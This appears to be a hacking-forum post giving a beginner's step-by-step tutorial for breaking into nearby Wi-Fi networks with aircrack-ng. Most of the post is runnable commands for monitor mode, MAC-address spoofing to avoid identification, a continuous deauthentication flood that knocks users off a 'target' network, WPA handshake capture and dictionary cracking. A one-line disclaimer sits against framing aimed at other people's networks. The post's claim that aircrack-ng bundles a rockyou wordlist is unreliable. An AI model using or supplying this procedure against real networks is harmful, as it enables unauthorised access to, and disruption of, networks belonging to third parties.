hello, been on hackforums for a week or two now and seen some great tutorials and overall threads and learned alot in the process, its by far the best community-forum i've ever seen, so by that said i felt is my time to contribute :)

and first of i'd like to say that i am no way an expert in this subject, im sure there are way better ways out there, but this way works for me and its what im using, but feel free to comment if there is anything you feel worth mentioning about it! so lets begin!


how to hack nearby wifi's with aircrack-ng

what you will need:
linux distro, (im running ubuntu)
aircrack-ng
( sudo apt-get install aircrack-ng )
macchanger
( sudo apt-get install macchanger )

disclaimer, hacking into a network which is not your own or you do not have permission to is illegal, so do this on your own wifi

first of you will need to put your wireless card in monitor mode, to be able to airodump it.

type the following:

ifconfig
( locate your wireless interface, mine is wlp3s0 )
sudo ifconfig wlp3s0 down
iwconfig wlp3s0 mode monitor

after that we need to kill a few proccesses that will be disturbing aircrack-ng.

type:
airmon-ng check wlp3s0

there will come up a list of proccesses, networkmanager is one of them, simply type
kill <whatever number>

when thats done you can go ahead and spoof your mac address. ( you dont need to do this but better safe then sorry)

type:
macchanger -r wlp3s0

this will change your current mac address to a random one, thus the "-r" in the command.

and then once more to make sure the wireless card is in monitor mode
iwconfig wlp3s0 mode monitor
(it has a tendency to jump back to managed mode after killing the proccesses, atleast for me)
ifconfig wlp3s0 up

now we will start to actually find the wifi in question,
type:

airodump-ng wlp3s0

this will list all wifi's that are near enough to get a signal, it will display bssid(mac address), which channel their on, also what kind of encryption they have, and ofc the essid(the wifi's name).

once you've found your target, you ctrl+c to stop the scan.

then you do a more specific airodump, by typing the following:

airodump-ng -c <whatever channel your targets on> -w <a name for your file> --bssid <the mac address of your target> wlp3s0


this will start a airodump scan on your target only. so why did we typ -w ? to capture a handshake which is needed to actually crack the password we need a file to save it to, this will be saved in a .cap file.

so while scanning, you open up a new terminal ( ctrl+alt+t ), cause now we need to deauthenticate the users currently on the target wifi. type:

aireplay-ng -0 0 -a <bssid> wlp3s0
this will jam the signal for the targets network, dos it, so all connected to it will disconnect, the second 0 in the code means that it will keep going until you stop it, you can for example put a 5 there, and it will send only 5 deauth signals and then turn off. let it run for a few seconds, then ctrl+c to stop it. now go back to your airodump window, give it a few seconds, and it the right corner there should now be a handshake, (hard to miss it). which means we are done and has captured what we need and can therefore stop all the scans.

now there are numerous ways of cracking a password(probably more ways then i know of) but we are going to do a dictionary attack.

so what is a dictionary attack? its when you try every word listed in a dictionary, or a wordlist as it is called. there are tons of wordlists available online, just google them and you will find a few. i believe aircrack-ng even has a wordlist included called rockyou.txt which you can use, to execute this you type the following:

aircrack-ng <name>.cap -w <parent location of wordlist+wordlist>.
example:
aircrack-ng lolfile01.cap -w /home/desktop/wordlist.txt

and there you go! if password matches any of the words in your wordlist then you've successfully manage to hack the wifi! hope this helps you and feel free to ask if there is anything you are confused about, sorry if this tutorial is a bit blurry, this is my first tutorial, like ever, so feel free to leave suggestions of what i could improve til next time!

and also, by typing
reboot
in your terminal will restore all the proccesses you've killed and put your wireless card back into managed mode as usual!

cryptic5